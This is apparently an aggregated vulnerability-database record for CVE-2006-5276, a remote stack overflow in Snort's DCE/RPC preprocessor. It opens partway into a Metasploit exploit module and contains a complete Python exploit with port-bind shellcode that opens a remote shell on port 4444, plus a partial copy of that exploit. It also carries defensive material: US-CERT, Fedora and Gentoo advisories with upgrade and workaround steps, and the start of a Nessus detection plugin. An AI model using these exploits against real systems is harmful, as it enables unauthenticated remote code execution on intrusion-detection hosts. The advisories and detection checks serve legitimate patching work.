traffic. The vulnerability is due to a boundary\r\n\t\t\t\terror within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,\r\n\t\t\t\twhich may result a stack-based buffer overflow with a specially crafted packet\r\n\t\t\t\tsent on a network that is monitored by Snort.\r\n\r\n\t\t\t\tVulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.\r\n\r\n\t\t\t\tAny host on the Snort network may be used as the remote host. The remote host does not\r\n\t\t\t\tneed to be running the SMB service for the exploit to be successful.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Neel Mehta', #Original discovery (IBM X-Force)\r\n\t\t\t\t\t'Trirat Puttaraksa', #POC\r\n\t\t\t\t\t'Carsten Maartmann-Moe <carsten[at]carmaa.com>', #Metasploit win\r\n\t\t\t\t\t'0a29406d9794e4f9b30b3c5d6702c708' #Metasploit linux\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '32094' ],\r\n\t\t\t\t\t[ 'CVE', '2006-5276' ],\r\n\t\t\t\t\t[ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],\r\n\t\t\t\t\t[ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],\r\n\t\t\t\t\t[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 390,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x00407c01, # JMP ESP snort.exe\r\n\t\t\t\t\t\t\t'Offset' => 289, # The number of bytes before overwrite\r\n\t\t\t\t\t\t\t'Padding' => 0\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Redhat 8',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Ret' => 0xbffff110,\r\n\t\t\t\t\t\t\t'Offset' => 317,\r\n\t\t\t\t\t\t\t'Padding' => 28\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DisclosureDate' => 'Feb 19 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(139),\r\n\t\t\t\tOptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),\r\n\t\t\t\tOptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])\r\n\t\t\t], self.class)\r\n\r\n\t\tderegister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')\r\n\tend\r\n\r\n\tdef exploit\r\n\t\topen_pcap\r\n\r\n\t\tshost = datastore['SHOST'] || Rex::Socket.source_address(rhost)\r\n\r\n\t\tp = buildpacket(shost, rhost, rport.to_i)\r\n\r\n\t\tprint_status(\"Sending crafted SMB packet from #{shost} to #{rhost}:#{rport}...\")\r\n\r\n\t\tcapture_sendto(p, rhost)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef buildpacket(shost, rhost, rport)\r\n\t\tp = PacketFu::TCPPacket.new\r\n\t\tp.ip_saddr = shost\r\n\t\tp.ip_daddr = rhost\r\n\t\tp.tcp_dport = rport\r\n\t\tp.tcp_flags.psh = 1\r\n\t\tp.tcp_flags.ack = 1\r\n\r\n\t\t# SMB packet borrowed from http://exploit-db.com/exploits/3362\r\n\r\n\t\t# NetBIOS Session Service, value is the number of bytes in the TCP segment,\r\n\t\t# must be greater than the total size of the payload. Statically set.\r\n\t\theader = \"\\x00\\x00\\xde\\xad\"\r\n\r\n\t\t# SMB Header\r\n\t\theader << \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\r\n\t\theader << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\r\n\t\theader << \"\\x00\\x08\\x30\\x00\"\r\n\r\n\t\t# Tree Connect AndX Request\r\n\t\theader << \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\r\n\t\theader << \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\r\n\t\theader << \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\r\n\t\theader << \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\r\n\r\n\t\t# NT Create AndX Request\r\n\t\theader << \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\theader << \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\theader << \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\r\n\t\theader << \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\r\n\t\theader << \"\\x63\\x00\\x00\\x00\"\r\n\r\n\t\t# Write AndX Request #1\r\n\t\theader << \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\r\n\t\theader << \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\r\n\t\theader << \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\"\r\n\t\theader << \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\t\theader << \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\r\n\t\theader << \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\r\n\t\theader << \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\r\n\r\n\t\t# Write AndX Request #2\r\n\t\theader << \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\r\n\t\theader << \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\"\r\n\t\ttail = \"\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\r\n\r\n\t\t# Return address\r\n\t\teip = [target['Ret']].pack('V')\r\n\r\n\t\t# Sploit\r\n\t\tsploit = make_nops(10)\r\n\t\tsploit << payload.encoded\r\n\r\n\t\t# Padding (to pass size check)\r\n\t\tsploit << make_nops(1)\r\n\r\n\t\t# The size to be included in Write AndX Request #2, including sploit payload\r\n\t\trequestsize = [(sploit.size() + target['Offset'])].pack('v')\r\n\r\n\t\t# Assemble the parts into one package\r\n\t\tp.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit\r\n\r\n\t\tp.recalc\r\n\r\n\t\tp\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18723/"}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2006-5276"], "description": "Snort is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system. It features rules based logging and can perform protocol analysis, content searching/matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. Snort has a real-time alerting capabilty, with alerts being sent to syslog, a separate \"alert\" file, or as a WinPopup message via Samba's smbclient Edit /etc/snort.conf to configure snort and use snort.d to start snort This rpm is different from previous rpms and while it will not clobber your current snortd file, you will need to modify it. There are 9 different packages available All of them require the base snort rpm. Additionally, you will need to chose a binary to install. /usr/sbin/snort should end up being a symlink to a binary in one of the following configurations: plain plain+flexresp mysql mysql+flexresp postgresql postgresql+flexresp snmp snmp+flexresp bloat mysql+postgresql+flexresp+snmp Please see the documentation in /usr/share/doc/snort-2.7.0.1 There are no rules in this package the license they are released under fo rbids us from repackaging them and redistributing them. ", "modified": "2007-09-07T17:20:21", "published": "2007-09-07T17:20:21", "id": "FEDORA:L87HK0TM000738", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: snort-2.7.0.1-3.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:48", "description": "\nSnort 2.6.1 (Linux) - DCERPC Preprocessor Remote Buffer Overflow", "edition": 1, "published": "2007-03-30T00:00:00", "title": "Snort 2.6.1 (Linux) - DCERPC Preprocessor Remote Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-03-30T00:00:00", "id": "EXPLOITPACK:972D8B6C7B644A1017D14AAFD8E54233", "href": "", "sourceData": "#!/usr/bin/python\n#\n# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in\n# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.\n# This code was tested against snort-2.6.1 running on Red Hat Linux 8\n#\n# Author shall bear no responsibility for any screw ups caused by using this code\n# Winny Thomas :-)\n\nimport os\nimport sys\nimport time\nfrom scapy import *\n\n# Linux portbind shellcode; Binds shell on TCP port 4444\nshellcode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\"\nshellcode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\"\nshellcode += \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\"\nshellcode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\nshellcode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\"\nshellcode += \"\\x89\\xe1\\xcd\\x80\"\n\ndef ExploitSnort(target):\n # SMB packet borrowed from http://www.milw0rm.com/exploits/3391\n # NetBIOS Session Service\n smbreq = \"\\x00\\x00\\x02\\xab\"\n\n # SMB Header\n smbreq += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\n smbreq += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\n smbreq += \"\\x00\\x08\\x30\\x00\"\n\n # Tree Connect AndX Request\n smbreq += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\n smbreq += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\n smbreq += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\n smbreq += \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n # NT Create AndX Request\n smbreq += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n smbreq += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n smbreq += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\n smbreq += \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\n smbreq += \"\\x63\\x00\\x00\\x00\"\n\n # Write AndX Request #1\n smbreq += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n smbreq += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n smbreq += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x10\\x02\\x00\\x00\\x01\\x00\\x00\\x00\"\n smbreq += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\n smbreq += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\n smbreq += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\n smbreq += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n # Write AndX Request #2\n smbreq += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n smbreq += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\xce\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n smbreq += \"\\xed\\x1e\\x94\\x7c\\x90\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\"\n smbreq += \"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa9\"\n # The following address overwrites RET and points into our shellcode\n smbreq += struct.pack('<L', 0xbfffeff0)\n smbreq += '\\x90' * 50\n smbreq += shellcode\n smbreq += '\\x90' * 130\n\n packet = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / smbreq\n send(packet)\n\ndef ConnectRemoteShell(target):\n connect = '/usr/bin/telnet ' + target + ' 4444'\n os.system(connect)\n\nif __name__ == '__main__':\n try:\n target = sys.argv[1]\n except IndexError:\n print 'Usage: %s <ip of a host on snort network>' % sys.argv[0]\n sys.exit(-1)\n\n print '[+] Sending malformed SMB packet'\n ExploitSnort(target)\n print '[+] Connecting to remote shell in 3 seconds...'\n time.sleep(3)\n ConnectRemoteShell(target)\n\n# milw0rm.com [2007-03-30]", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-5276"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA07-050A\r\n\r\n\r\nSourcefire Snort DCE/RPC Preprocessor Buffer Overflow\r\n\r\n Original release date: February 19, 2007\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Snort 2.6.1, 2.6.1.1, and 2.6.1.2\r\n * Snort 2.7.0 beta 1\r\n * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with\r\n SEUs prior to SEU 64\r\n * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x,\r\n and 4.6x with SEUs prior to SEU 64\r\n\r\n Other products that use Snort or Snort components may be affected.\r\n\r\n\r\nOverview\r\n\r\n A stack buffer overflow vulnerability in the Sourcefire Snort\r\n DCE/RPC preprocessor could allow an unauthenticated, remote\r\n attacker to execute arbitrary code with the privileges of the Snort\r\n process.\r\n\r\n\r\nI. Description\r\n\r\n Sourcefire Snort is a widely-deployed, open-source network\r\n intrusion detection system (IDS). Snort and its components are used\r\n in other IDS products, notably Sourcefire, and Snort is included\r\n with a number of operating system distributions. The DCE/RPC\r\n preprocessor reassembles fragmented SMB and DCE/RPC traffic before\r\n passing data to the Snort rules.\r\n\r\n The vulnerable code does not properly reassemble certain types of\r\n SMB and DCE/RPC packets. An attacker could exploit this\r\n vulnerability by sending a specially crafted TCP packet to a host\r\n or network monitored by Snort. The DCE/RPC preprocessor is enabled\r\n by default, and it is not necessary for an attacker to complete a\r\n TCP handshake.\r\n\r\n US-CERT is tracking this vulnerability as VU#196240. This\r\n vulnerability has been assigned CVE number CVE-2006-5276. Further\r\n information is available in advisories from Sourcefire and ISS.\r\n\r\n\r\nII. Impact\r\n\r\n A remote, unauthenticated attacker may be able to execute arbitrary\r\n code with the privilege level of the Snort preprocessor.\r\n\r\n\r\nIII. Solution\r\n\r\nUpgrade\r\n\r\n Snort 2.6.1.3 is available from the Snort download site. Sourcefire\r\n customers should visit the Sourcefire Support Login site.\r\n\r\nDisable the DCE/RPC Preprocessor\r\n\r\n To disable the DCE/RPC preprocessor, comment out the line that loads\r\n the preprocessor in the Snort configuration file (typically\r\n /etc/snort.conf on UNIX and Linux systems):\r\n\r\n [/etc/snort.conf]\r\n ...\r\n #preprocessor dcerpc...\r\n ...\r\n \r\n Restart Snort for the change to take effect.\r\n\r\n Disabling the preprocessor will prevent Snort from reassembling\r\n fragmented SMB and DCE/RPC packets. This may allow attacks to evade\r\n the IDS.\r\n\r\n\r\nIV. References\r\n\r\n * US-CERT Vulnerability Note VU#196240 -\r\n <http://www.kb.cert.org/vuls/id/196240>\r\n\r\n * Sourcefire Advisory 2007-02-19 -\r\n <http://www.snort.org/docs/advisory-2007-02-19.html>\r\n\r\n * Sourcefire Support Login - <https://support.sourcefire.com/>\r\n\r\n * Sourcefire Snort Release Notes for 2.6.1.3 -\r\n <http://www.snort.org/docs/release_notes/release_notes_2613.txt>\r\n\r\n * Snort downloads - <http://www.snort.org/dl/>\r\n\r\n * DCE/RPC Preprocessor -\r\n <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html>\r\n\r\n * IBM Internet Security Systems Protection Advisory -\r\n <http://iss.net/threats/257.html>\r\n\r\n * CVE-2006-5276 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA07-050A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2007 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n February 19, 2007: Initial Release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP\r\nqulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq\r\n+kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6\r\nOuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w\r\nRSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg\r\n+EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg==\r\n=T7v8\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2007-02-20T00:00:00", "published": "2007-02-20T00:00:00", "id": "SECURITYVULNS:DOC:16119", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16119", "title": "US-CERT Technical Cyber Security Alert TA07-050A -- Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-5276"], "description": "Buffer overflow on DCE/RPC protocol parsing.", "edition": 1, "modified": "2007-02-20T00:00:00", "published": "2007-02-20T00:00:00", "id": "SECURITYVULNS:VULN:7267", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7267", "title": "snort IDS buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:00", "bulletinFamily": "unix", "cvelist": ["CVE-2006-5276"], "description": "### Background\n\nSnort is a widely deployed intrusion detection program. \n\n### Description\n\nThe Snort DCE/RPC preprocessor does not properly reassemble certain types of fragmented SMB and DCE/RPC packets. \n\n### Impact\n\nA remote attacker could send specially crafted fragmented SMB or DCE/RPC packets, without the need to finish the TCP handshake, that would trigger a stack-based buffer overflow while being reassembled. This could lead to the execution of arbitrary code with the permissions of the user running the Snort preprocessor. \n\n### Workaround\n\nDisable the DCE/RPC processor by commenting the 'preprocessor dcerpc' section in /etc/snort/snort.conf . \n\n### Resolution\n\nAll Snort users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/snort-2.6.1.3\"", "edition": 1, "modified": "2007-03-02T00:00:00", "published": "2007-02-23T00:00:00", "id": "GLSA-200703-01", "href": "https://security.gentoo.org/glsa/200703-01", "type": "gentoo", "title": "Snort: Remote execution of arbitrary code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:09:58", "description": "No description provided by source.", "published": "2007-04-03T00:00:00", "title": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-04-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-6573", "id": "SSV:6573", "sourceData": "\n #!/usr/bin/python\r\n#\r\n# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in\r\n# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.\r\n# This code was tested against snort-2.6.1 running on Red Hat Linux 8\r\n#\r\n# Author shall bear no responsibility for any screw ups caused by using this code\r\n# Winny Thomas :-)\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nfrom scapy import *\r\n\r\n# Linux portbind shellcode; Binds shell on TCP port 4444\r\nshellcode = \\\"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96\\\"\r\nshellcode += \\\"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56\\\"\r\nshellcode += \\\"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1\\\"\r\nshellcode += \\\"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0\\\"\r\nshellcode += \\\"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53\\\"\r\nshellcode += \\\"x89xe1xcdx80\\\"\r\n\r\ndef ExploitSnort(target):\r\n # SMB packet borrowed from http://www.milw0rm\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6573"}], "nessus": [{"lastseen": "2021-01-12T10:06:05", "description": "This build moves from manual linking to alternatives.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-11-06T00:00:00", "title": "Fedora 7 : snort-2.7.0.1-3.fc7 (2007-2060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "modified": "2007-11-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:snort-postgresql+flexresp", "cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:snort-plain+flexresp", "p-cpe:/a:fedoraproject:fedora:snort-snmp+flexresp", "p-cpe:/a:fedoraproject:fedora:snort-postgresql", "p-cpe:/a:fedoraproject:fedora:snort-snmp", "p-cpe:/a:fedoraproject:fedora:snort-bloat", "p-cpe:/a:fedoraproject:fedora:snort-debuginfo", "p-cpe:/a:fedoraproject:fedora:snort", "p-cpe:/a:fedoraproject:fedora:snort-mysql+flexresp", "p-cpe:/a:fedoraproject:fedora:snort-mysql"], "id": "FEDORA_2007-2060.NASL", "href": "https://www.tenable.com/plugins/nessus/27749", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-2060.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27749);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2006-5276\");\n script_xref(name:\"FEDORA\", value:\"2007-2060\");\n\n script_name(english:\"Fedora 7 : snort-2.7.0.1-3.fc7 (2007-2060)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This build moves from manual linking to alternatives.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-September/003647.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97f7ef15\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Snort 2 DCE/RPC Preprocessor Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-bloat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-mysql+flexresp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-plain+flexresp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-postgresql+flexresp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-snmp+flexresp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 